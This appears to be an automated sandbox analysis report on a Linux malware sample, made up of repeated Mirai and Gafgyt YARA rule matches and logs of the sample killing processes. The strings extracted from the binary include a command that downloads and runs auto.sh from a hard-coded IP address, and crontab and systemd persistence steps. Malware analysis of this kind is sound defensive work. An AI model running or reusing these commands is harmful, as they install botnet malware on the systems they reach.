Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 4431, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 6305, result: successfulJump to behavior
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: G%s/%s/proc//proc/%s/cmdlinewgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe/mnt/root/dev/null/dev/consolewsystemctl daemon-reload/tmp/current_crontabcrontab %s/tmp/crontabXXXXXX@reboot %s
Source: Initial sampleString containing 'busybox' found: systemctl enable startup_command.servicecrontab -l > /tmp/current_crontab 2>/dev/nullcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.20.138/auto.sh || busybox wget http://154.216.20.138/auto.sh || curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 4431, result: successfulJump to behavior
Source: /tmp/i586.elf (PID: 6270)SIGKILL sent: pid: 6305, result: successfulJump to behavior
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: i586.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6455.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6570.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6495.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6457.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6267.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
